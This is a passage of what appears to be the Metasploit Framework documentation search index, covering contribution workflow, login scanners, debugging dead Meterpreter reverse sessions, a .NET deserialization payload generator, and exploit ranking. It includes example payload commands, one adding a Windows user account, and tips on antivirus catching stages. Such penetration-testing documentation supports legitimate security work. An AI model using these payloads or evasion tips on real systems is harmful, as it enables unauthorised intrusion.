    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#ftp_login-final-view"
  },"77": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Writing an FTP LoginScanner",
    "content": "So, you want to make a Login Scanner Module in Metasploit, eh? There are a few things you will need to know before you begin. This article will try to illustrate all the moving pieces involved in creating an effective bruteforce/login scanner module. | Credential objects | Result objects | CredentialCollection | LoginScanner Base . | Attributes | Methods | Constants | . | Pulling it all Together in a module . | The Cred Collection | Initialising the Scanner | The scan block | ftp_login final view | . | . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html"
  },"78": {
    "doc": "Creating Your First PR",
    "title": "Creating Your First PR - An Intro To Git and the PR Process",
    "content": " ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#creating-your-first-pr---an-intro-to-git-and-the-pr-process",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#creating-your-first-pr---an-intro-to-git-and-the-pr-process"
  },"79": {
    "doc": "Creating Your First PR",
    "title": "Intro",
    "content": "Congratulations fellow traveler, so you’re interested in contributing to Metasploit, eh? Well, welcome aboard; it’s going to be a fun ride! You’ll learn lots along the way, but here are some tips and tricks that should help you get started with making your first PR whilst also avoiding some common pitfalls and learning how some of our systems work. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#intro",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#intro"
  },"80": {
    "doc": "Creating Your First PR",
    "title": "Initial Steps and Important Notes",
    "content": "The rest of this guide assumes you have already followed the steps at Setting Up A Developer Environment in order to get a fork of Metasploit set up and ready to run, and that you have added in your SSH keys (see Adding a New SSH Key To Your GitHub Account), set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#initial-steps-and-important-notes",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#initial-steps-and-important-notes"
  },"81": {
    "doc": "Creating Your First PR",
    "title": "Getting the Latest Version of Metasploit Framework",
    "content": "Before making any new contributions, you will want to make sure you are running the latest version of Metasploit Framework. To do this run git checkout master && git fetch upstream && git pull, where upstream is the remote pointing at Rapid7’s copy of the code. You can verify that upstream is set correctly by running git remote get-url upstream and verifying it is set to git@github.com:rapid7/metasploit-framework.git. Once you run this command, it will check out the master branch, then fetch all the changes from upstream (which should be configured to be Rapid7’s copy of Metasploit Framework on GitHub). Once it has cached these changes, the git pull command will then pull these changes into the current branch, aka master. Not pulling down changes before writing new code could lead to big issues down the line, particularly if someone has edited a file you intended to modify. In that case maintainers will then have to try to find the right combination of changes to implement, which could lead to your PR being rejected if these changes are too complex. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#getting-the-latest-version-of-metasploit-framework",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#getting-the-latest-version-of-metasploit-framework"
  },"82": {
    "doc": "Creating Your First PR",
    "title": "Making Sure Your Gems Are Updated",
    "content": "The next step is to make sure you have the latest copy of the Gems that Metasploit Framework depends on. This can be done by running bundle install from the directory where the Gemfile.lock file is located, which will be the folder you cloned your fork into locally. Doing this ensures you are running the latest libraries, so that any bugs you encounter whilst developing code are not caused by out-of-date Gems and are therefore potentially legitimate bugs that need fixing. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#making-sure-your-gems-are-updated",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#making-sure-your-gems-are-updated"
  },"83": {
    "doc": "Creating Your First PR",
    "title": "Creating a New Branch for Your Code",
    "content": "Once all of this is done, you will want to create a new branch for your code, which can be done by running git checkout -b <your branch name here>. This will snapshot the current branch that you are on, and use that to create a new branch with the name provided. Note that I did say snapshot. This is why it’s important to update the current branch’s code to the latest version of Metasploit Framework available prior to running this command, otherwise the new branch will contain outdated code. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#creating-a-new-branch-for-your-code",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#creating-a-new-branch-for-your-code"
  },"84": {
    "doc": "Creating Your First PR",
    "title": "Adding in Your Changes and Creating Meaningful Commit Messages",
    "content": "Once you have made your code changes, add them using git add <path to file to add> <optional path to second file to add>. Note that you can specify multiple files to add using git add at the same time. To commit these changes locally, use git commit -m \"<commit message here>\". Note that as a general rule of thumb, commit messages should aim to be 50 characters or less while telling readers what was changed in that commit. You generally don’t want to create commits that do multiple things at once, instead create a separate commit for each group of items that you are changing, and make sure that the commit message reflects what changed in a general sense. Note also that maintainers may end up squashing your commits down so that your commit A, B, and C, now become commit D which contains all of the same changes as commit A, B, and C, but in one commit and with one associated commit message. This is often done when the code is ready to be landed into Metasploit Framework to help make the commit history easier for people to read. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#adding-in-your-changes-and-creating-meaningful-commit-messages",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#adding-in-your-changes-and-creating-meaningful-commit-messages"
  },"85": {
    "doc": "Creating Your First PR",
    "title": "Checking for Code Errors",
    "content": "Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, from the root of wherever you cloned your fork of Metasploit Framework to on disk, run rubocop <path to your module from current directory>. Specifying the -a parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix. In this case the command would be rubocop -a <path to your module from current directory>. It is encouraged to keep running this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is complete, run git add <file> followed by git commit -m \"RuboCop Fixes\". You can change the commit message if you want, but it should mention RuboCop as it helps maintainers know what the commit is related to. As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes. This helps ensure that when it comes time to review your code, review can proceed much more quickly and efficiently. Note that special cases exist if you are writing library code as our RuboCop rules are primarily designed to be run against modules. If at any point you are confused regarding this, please feel free to reach out and ask us for help on Slack at https://metasploit.com/slack. Once this is done, the next tool to run is located in the root of the Metasploit local fork at tools/dev/msftidy.rb. You will want to run this tool against your module code (if applicable), using tools/dev/msftidy.rb <path to module>. This will give some output if there are any errors, or no output if your module passed the tests. Try and fix any errors mentioned here. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#checking-for-code-errors",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#checking-for-code-errors"
  },"86": {
    "doc": "Creating Your First PR",
    "title": "Writing Documentation",
    "content": "The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information on how to write module documentation at Writing Module Documentation. In general when writing documentation you will want to search for a similar documentation file under the documentation folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing your new documentation for your module. When writing the information for the documentation, make sure your installation steps are as clear as possible. Any confusion over how to set up the target to be exploited will likely result in delays. You will want to put as much detail here as possible. Additionally any information about caveats, scenarios you have tested, custom options you added in, or quirks you noticed should also go into this file. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#writing-documentation",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#writing-documentation"
  },"87": {
    "doc": "Creating Your First PR",
    "title": "Checking Documentation Syntax",
    "content": "Once you have written the documentation, you then want to run tools/dev/msftidy_docs.rb <path to documentation file>. This will report on any errors with your documentation file, which you will want to fix before submitting your PR. Notice however that if you get a warning about long lines, these may be okay to ignore depending on the context. A good example is if a line is long merely because of a URL. Such warnings can be safely ignored. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#checking-documentation-syntax",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#checking-documentation-syntax"
  },"88": {
    "doc": "Creating Your First PR",
    "title": "Submitting Your Changes and Opening a PR",
    "content": "Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which remote points to your copy of the code. If you have followed the setup guide, it should be origin. You can double check this remote’s URL using git remote get-url origin. It should look something like git@github.com:gwillcox-r7/metasploit-framework with gwillcox-r7 substituted for your username. Assuming the origin remote is in fact pointing to your copy of the code, run git push origin local-branch:remote-branch and replace local-branch with the branch locally where your code changes are located, and remote-branch with what you want this branch to be called on the remote repository, aka origin, which will be your fork on GitHub.com. In most cases you will want these two names to be the same to avoid confusion, but it’s good to know this syntax should you start working with more complex situations. Note that if the remote pointing to your copy of the code is not named origin, replace the word origin in the command above with the name of the remote that does point to your copy of the code. This should result in output similar to the following: . > git push origin update_mssql_lib_parameters:update_mssql_lib_parameters Enumerating objects: 15, done. Counting objects: 100% (15/15), done. Delta compression using up to 2 threads Compressing objects: 100% (8/8), done. Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done. Total 8 (delta 7), reused 0 (delta 0), pack-reused 0 remote: Resolving deltas: 100% (7/7), completed with 7 local objects. remote: remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting: remote: https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters remote: To github.com:gwillcox-r7/metasploit-framework * [new branch] update_mssql_lib_parameters -> update_mssql_lib_parameters . To create a new pull request (aka PR), browse to the URL mentioned in this output. In this case for the output above this would be https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters. This will open a new template for creating a PR. Please follow all of the directions here and provide the requested details whilst also deleting the template text once you have provided the requested information. Note that PRs that do not provide anything but the template text for their description will be closed. In your PR description you should take care to mention what it is that you are submitting, details on the type of vulnerability and CVE-ID, if applicable, how to test the submission, as well as any special concerns or items of note that occurred whilst conducting testing. Once this is done a member of our team will review your PR within a few days and provide feedback on any changes that may still need to be made before the submission can be accepted. ",
    "url": "/docs/development/get-started/creating-your-first-pr.html#submitting-your-changes-and-opening-a-pr",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html#submitting-your-changes-and-opening-a-pr"
  },"89": {
    "doc": "Creating Your First PR",
    "title": "Creating Your First PR",
    "content": " ",
    "url": "/docs/development/get-started/creating-your-first-pr.html",
    "relUrl": "/docs/development/get-started/creating-your-first-pr.html"
  },"90": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "On this page",
    "content": ". | On this page | Background knowledge | Stagers, stages, and handlers | LHOST and LPORT | LHOST | LPORT | Check dead shells . | Quick things to check | Not so quick things to check | . | . Dead shells. Nobody likes them. Yet, despite the advances made in the Metasploit stagers and Meterpreter itself, we still see them regularly. There are many reasons why shells refuse to connect or die after they’re established. The goal of this post is to help people understand why. Hopefully, by the end, the most common causes will be understood, and users can fix things themselves. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#on-this-page",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#on-this-page"
  },"91": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "Background knowledge",
    "content": "Prior to diving into the possible breakages and their causes, it’s important to have some background knowledge of stagers, and how Meterpreter works. Please be sure to read the following articles prior to reading the rest of this post: . | Meterpreter Stageless Mode - Covers the exploitation process, and how Meterpreter sessions are established. This is important because understanding how the different components interact allows for easier debugging later. | Meterpreter Configuration - Covers how configuration works in Meterpreter. This is important because it highlights the separation of configuration in stagers and Meterpreter. This alone is the key to many breakages, especially in HTTP/S payloads. | The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers - Covers the detail of HTTP/S based communications in the stagers and in Meterpreter itself. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#background-knowledge",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#background-knowledge"
  },"92": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "Stagers, stages, and handlers",
    "content": "Each exploit and handler is made up of multiple things, and they’re all independent: . | Stager: This is the small bit of code that is first executed by the target. It contains its own bundled implementation of a communications channel. It has the goal of establishing communication with Metasploit, downloading the stage, and invoking it. It has its own configuration. | Stage: This is the second payload that is executed by the target. It is sent to the target via the communications channel that was opened by the stager. Once downloaded, it is invoked, and from there, it takes over. It has its own configuration. | Handler: This is the code that runs on the attacker’s machine. It is responsible for handling the attacker-side of the communications channel that is established by the stager. It is responsible for uploading the stage. It is responsible for handling communication between the attacker and the target once the stage has taken over from the stager. | . In some cases, there might be multiple stages (as is the case with POSIX Meterpreter). This is called an intermediate stage. Usually, these stages are slightly bigger than the stager and can do more work to help establish communications. The most important thing to remember is that both the stager and the stage have their own configurations that are independent. THE MOST COMMON cause of dead shells is the result of the stage not having the correct configuration; in other words, its configuration differs from that specified in the stager. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#stagers-stages-and-handlers",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#stagers-stages-and-handlers"
  },"93": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "LHOST and LPORT",
    "content": "Any user of Metasploit will tell you that they know what LHOST and LPORT mean, yet it’s incredibly common to find out that their understanding isn’t 100% correct. To prevent dead sessions that are related to a misconfiguration of these values, we need to make sure we understand what they mean. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lhost-and-lport",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lhost-and-lport"
  },"94": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "LHOST",
    "content": "LHOST is short for Local Host. This value represents the IP address or hostname that stagers and stages should attempt to connect to. It is where the handler can be reached. This doesn’t mean that this is where the handler actually exists. LHOST is a value that has meaning from the perspective of the target machine. This value is passed along as part of the configuration for stagers and stages and tells the target machine where to go to reach the handler, and so this has to map to a value that is reachable by the target. A handler obviously needs to listen on a host/IP for the incoming connection. In cases where the LHOST value, that is, the address that the target is able to reach, is the same as that which the host can listen on, no extra work has to be done. The LHOST value is used by the handler. However, if some kind of NAT or port forward is enabled, or if the handler is behind a firewall, then setting LHOST isn’t enough. In order to listen on the appropriate interface, another setting must be used called ReverseListenerBindAddress. This value tells the handler to listen on a different interface/IP, but it doesn’t change the fact that the LHOST value is given to the target when the stage is uploaded. In short, LHOST must always remain the IP/host that is routable from the target, and if this value is not the same as what the listener needs to bind to, then change the ReverseListenerBindAddress value. If you’re attacking something across the Internet and you specify an internal IP in LHOST, you’re doing it wrong. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lhost",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lhost"
  },"95": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "LPORT",
    "content": "The principles of LHOST and ReverseListenerBindAddress can be applied to LPORT and ReverseListenerBindPort as well. If you have port forwarding in place, and your listener needs to bind to a different port, then you need to make use of the ReverseListenerBindPort setting. The classic example of this case is where an attacker wants to make use of port 443, but rightfully doesn’t want to run Metasploit as root just so they can directly bind to ports lower than 1024. Instead, they set up a port forward (on their router, or using iptables) so that 443 forwards to 8443, with a goal of accepting connections on that port instead. To accommodate this scenario, the LPORT value must still contain 443, as this is the port that the target machine needs to establish communications on; 443 is the value that needs to go out with the stager and the stage configurations. Metasploit needs to bind locally to port 8443, and so the handler is configured so that ReverseListenerBindPort has this value instead. When the handler launches, it binds to 8443 and handles any connections it receives. When a stage is generated, it uses 443 from the LPORT value to populate the configuration. If the attacker makes the mistake of either setting LPORT to 8443, or leaving LPORT as 443 and not using ReverseListenerBindPort, then the result is either a dead shell after the first stage, or no connect back at all. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lport",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#lport"
  },"96": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "Check dead shells",
    "content": "There are a few things to check for when debugging a dead shell. Quick things to check . | Make sure that LHOST is set to a routable address from the target, and not a local listen address. | Make sure that LPORT is set to the port number that the target needs to connect to. | Make sure that ReverseListenerBindPort is set if port forwarding is enabled and the traffic is being routed to a different port. | Make sure that your listener’s configuration matches that of the target from an architecture perspective. If you mix x64 listeners with x86 payloads (and vice versa), things will break. | . Not so quick things to check . | If the target is running AntiVirus there’s a chance that the stage, for example metsrv, is being caught while being uploaded. reverse_tcp and reverse_http stagers download metsrv without any encryption, and so the content of the DLL is visible to anything watching on the wire. reverse_https can still get caught in cases where AV is doing MITM content inspection. In this case, consider encoding your payloads, or if possible using stageless Meterpreter instead. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#check-dead-shells",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html#check-dead-shells"
  },"97": {
    "doc": "Debugging Dead Meterpreter Sessions",
    "title": "Debugging Dead Meterpreter Sessions",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/debugging-dead-meterpreter-sessions.html"
  },"98": {
    "doc": "Definition of Module Reliability Side Effects and Stability",
    "title": "Allowed Values",
    "content": "Stability . | Constant | Description | . | CRASH_SAFE | Module should not crash the service or OS | . | CRASH_SERVICE_RESTARTS | Module may crash the service, but it will restart | . | CRASH_SERVICE_DOWN | Module may crash the service, and remain down | . | CRASH_OS_RESTARTS | Module may crash the OS, but it will restart | . | CRASH_OS_DOWN | Module may crash the OS, and remain down | . | SERVICE_RESOURCE_LOSS | Module causes a resource to be unavailable for the service | . | OS_RESOURCE_LOSS | Module causes a resource to be unavailable for the OS | . Side Effects . | Constant | Description | . | ARTIFACTS_ON_DISK | Module leaves a payload, a dropper, etc, on the target machine | . | CONFIG_CHANGES | Module modifies some config file | . | IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) | . | ACCOUNT_LOCKOUTS | Module may cause an account to lock out | . | SCREEN_EFFECTS | Module shows something on the screen that a human may notice | . | PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) | . | AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) | . Reliability . | Constant | Description | . | FIRST_ATTEMPT_FAIL | The module may fail for the first attempt | . | REPEATABLE_SESSION | The module is expected to get a session every time it runs | . | UNRELIABLE_SESSION | The module isn’t expected to get a shell reliably (such as only once) | . | EVENT_DEPENDENT | The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc | . ",
    "url": "/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html#allowed-values",
    "relUrl": "/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html#allowed-values"
  },"99": {
    "doc": "Definition of Module Reliability Side Effects and Stability",
    "title": "Definition of Module Reliability Side Effects and Stability",
    "content": "New Metasploit modules are now required to contain a Notes section containing additional information such as the Stability, Reliability and SideEffects associated with running the module. Example: . def initialize(info = {}) super( update_info( info, 'Name' => 'Module name', 'Description' => %q{ Module description }, 'Author' => [ 'Author name' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2020-XXXX'] ], 'DisclosureDate' => '2020-03-26', 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, # All new modules must contain the below information. See below for more details for allowed values 'Notes' => { 'Stability' => [...], 'Reliability' => [...], 'SideEffects' => [...] } ) ) end . ",
    "url": "/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html",
    "relUrl": "/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html"
  },"100": {
    "doc": "Dot Net Deserialization",
    "title": "Support Matrix",
    "content": "The following table outlines the supported gadget chains, formatters and the compatibility of each. | Gadget Chain Name | BinaryFormatter | LosFormatter | SoapFormatter | . | ClaimsPrincipal | Yes | Yes | Yes | . | TextFormattingRunProperties | Yes | Yes | Yes | . | TypeConfuseDelegate | Yes | Yes | No | . | WindowsIdentity | Yes | Yes | Yes | . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#support-matrix",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#support-matrix"
  },"101": {
    "doc": "Dot Net Deserialization",
    "title": "Basic Usage",
    "content": "The library is located in Msf::Util::DotNetDeserialization and contains the following methods which are intended for use by module authors. | #generate(cmd, gadget_chain:, formatter:) . This function will generate a serialized payload to execute the specified operating system command cmd. The command is serialized using the specified gadget_chain and formatted with the specified formatter. The gadget_chain and formatter options will be specific to the vulnerability that is being exploited. This function returns a string. | #generate_formatted(stream, formatter:) . Format a SerializedStream object, as created by #generate_gadget_chain. The stream will be formatted using the specified formatter and returned as a string. | #generate_gadget_chain(cmd, gadget_chain:) . Create a gadget chain to run the specified operating system command cmd. This returns a SerializedStream object which can be inspected and modified but must be formatted (using #generate_formatted) before it is useful. | . #generate is the primary function and is functionally equivalent to the following (both helpers take keyword arguments, matching their signatures above). In the future the #generate_* functions may contain additional options specific to their respective chain or formatter. stream = generate_gadget_chain(cmd, gadget_chain: gadget_chain) formatted = generate_formatted(stream, formatter: formatter) . Example Usage . The following example uses the TextFormattingRunProperties gadget chain formatted with the LosFormatter. serialized = ::Msf::Util::DotNetDeserialization.generate( cmd, # this is the Operating System command to run gadget_chain: :TextFormattingRunProperties, formatter: :LosFormatter ) . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#basic-usage",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#basic-usage"
  },"102": {
    "doc": "Dot Net Deserialization",
    "title": "Command Line Tool",
    "content": "The library also has an interface available as a standalone command line tool which is suitable for creating payloads for single-use research purposes. This tool dot_net.rb is available in the tools/payloads/ysoserial directory. The arguments for this tool are aligned with those of YSoSerial.NET, allowing the arguments of basic invocations to be the same. It should be noted however that the supported gadgets and formatters are not the same. Help output: . Usage: ./dot_net.rb [options] Generate a .NET deserialization payload that will execute an operating system command using the specified gadget chain and formatter. Available formatters: * BinaryFormatter * LosFormatter * SoapFormatter Available gadget chains: * ClaimsPrincipal * DataSet * DataSetTypeSpoof * ObjectDataProvider * TextFormattingRunProperties * TypeConfuseDelegate * WindowsIdentity Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5 Examples: ./dot_net.rb -c \"net user msf msf /ADD\" -f BinaryFormatter -g TypeConfuseDelegate -o base64 ./dot_net.rb -c \"calc.exe\" -f LosFormatter -g TextFormattingRunProperties \\ --viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1 General options: -h, --help Show this message -c, --command <String> The command to run -f, --formatter <String> The formatter to use (default: BinaryFormatter) -g, --gadget <String> The gadget chain to use (default: TextFormattingRunProperties) -o, --output <String> The output format to use (default: raw, see: --list-output-formats) --list-output-formats List available output formats, for use with --output ViewState related options: --viewstate-generator <String> The ViewState generator string to use --viewstate-validation-algorithm <String> The validation algorithm (default: SHA1, see: Available HMAC algorithms) --viewstate-validation-key <HexString> The validationKey from the web.config file . The -g / --gadget option maps to the gadget_chain argument for the generate functions while the -f / --formatter argument maps to the formatter argument. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#command-line-tool",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#command-line-tool"
  },"103": {
    "doc": "Dot Net Deserialization",
    "title": "Making Changes",
    "content": "Adding new gadget chains and formatters involves creating a new file in the respective library directory: lib/msf/util/dot_net_deserialization. The “native” gadget chain type is implemented following the MS-NRBF format and the BinData records as defined in the types/ subdirectory. Once the new gadget chain or formatter is implemented, it needs to be added to the main library file (dot_net_deserialization.rb). Since gadget chain generation is deterministic, a unit test should be added for any new gadget chain to ensure that the checksum of the BinaryFormatter representation is consistent. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#making-changes",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#making-changes"
  },"104": {
    "doc": "Dot Net Deserialization",
    "title": "Further Reading",
    "content": "Since the .NET deserialization gadgets run operating system commands, the following resources can be helpful for module developers to deliver native payloads such as Meterpreter. | How to use command stagers | How to use Powershell in an exploit | . ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#further-reading",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html#further-reading"
  },"105": {
    "doc": "Dot Net Deserialization",
    "title": "Dot Net Deserialization",
    "content": "Metasploit includes a library for leveraging .NET deserialization attacks. Using it within a module is very straightforward: the module author just needs to know two things, the gadget chain and the formatter. The library uses the same names for each of these values as the YSoSerial.NET project for compatibility, although the Metasploit library only supports a subset of the functionality. ",
    "url": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html"
  },"106": {
    "doc": "Downloads by Version",
    "title": "Metasploit Framework Installers",
    "content": "These include Metasploit Framework only. Updates are built about once a day. See Nightly-Installers for installation instructions for Windows, OS X and Linux. ",
    "url": "/docs/development/maintainers/downloads-by-version.html#metasploit-framework-installers",
    "relUrl": "/docs/development/maintainers/downloads-by-version.html#metasploit-framework-installers"
  },"107": {
    "doc": "Downloads by Version",
    "title": "Metasploit Pro Installers",
    "content": "These include the Pro UI as well as Framework. Updates are released about once every other week for Windows and Linux. The PGP signatures below can be verified with the following public key . | Download Link | File Type | SHA1 | PGP | . | metasploit-4.22.2-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.22.2-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.22.1-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.22.1-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.22.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.22.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.21.1-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.21.1-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.21.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.21.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.20.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.20.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.19.1-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.19.1-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.19.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.19.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.18.0-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.18.0-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . | metasploit-4.17.1-windows-x64-installer.exe | Windows 64-bit | SHA1 | PGP | . | metasploit-4.17.1-linux-x64-installer.run | Linux 64-bit | SHA1 | PGP | . ",
    "url": "/docs/development/maintainers/downloads-by-version.html#metasploit-pro-installers",
    "relUrl": "/docs/development/maintainers/downloads-by-version.html#metasploit-pro-installers"
  },"108": {
    "doc": "Downloads by Version",
    "title": "Metasploit Framework Source",
    "content": "Please see the Metasploit framework releases page for the release versions of Metasploit Framework. ",
    "url": "/docs/development/maintainers/downloads-by-version.html#metasploit-framework-source",
    "relUrl": "/docs/development/maintainers/downloads-by-version.html#metasploit-framework-source"
  },"109": {
    "doc": "Downloads by Version",
    "title": "Downloads by Version",
    "content": " ",
    "url": "/docs/development/maintainers/downloads-by-version.html",
    "relUrl": "/docs/development/maintainers/downloads-by-version.html"
  },"110": {
    "doc": "Evading Anti Virus",
    "title": "Evading Anti Virus",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/evading-anti-virus.html",
    "relUrl": "/docs/using-metasploit/intermediate/evading-anti-virus.html"
  },"111": {
    "doc": "Evading Anti Virus",
    "title": "Read these links",
    "content": ". | Why encoding does not matter, and how Metasploit generates exes | Facts and myths about antivirus evasion with Metasploit | Using metasm to avoid antivirus detection ghost writing asm | . There are approximately 14 million other resources out there on the whys and wherefores of evading antivirus, but the above articles should get you started. ",
    "url": "/docs/using-metasploit/intermediate/evading-anti-virus.html#read-these-links",
    "relUrl": "/docs/using-metasploit/intermediate/evading-anti-virus.html#read-these-links"
  },"112": {
    "doc": "Exploit Ranking",
    "title": "Exploit Ranking",
    "content": "Every exploit module has been assigned a rank based on its potential impact to the target system. Users can search, categorize, and prioritize exploits based on rankings. The ranking is implemented by adding a Rank constant at the top of the class declaration in a module: . class MetasploitModule &lt; Msf::Exploit Rank = LowRanking def initialize(info={}) ... end ... end . The ranking values are one of the following, in descending order of reliability: . | Ranking | Description | . | ExcellentRanking | The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances (WMF Escape()). | . | GreatRanking | The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. | . | GoodRanking | The exploit has a default target and it is the “common case” for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). Exploit does not auto-detect the target. | . | NormalRanking | The exploit is otherwise reliable, but depends on a specific version that is not the “common case” for this type of software and can’t (or doesn’t) reliably autodetect. | . | AverageRanking | The exploit is generally unreliable or difficult to exploit, but has a success rate of 50% or more for common platforms. | . | LowRanking | The exploit is nearly impossible to exploit (under 50% success rate) for common platforms. | . | ManualRanking | The exploit is unstable or difficult to exploit and is basically a DoS (15% success rate or lower). This ranking is 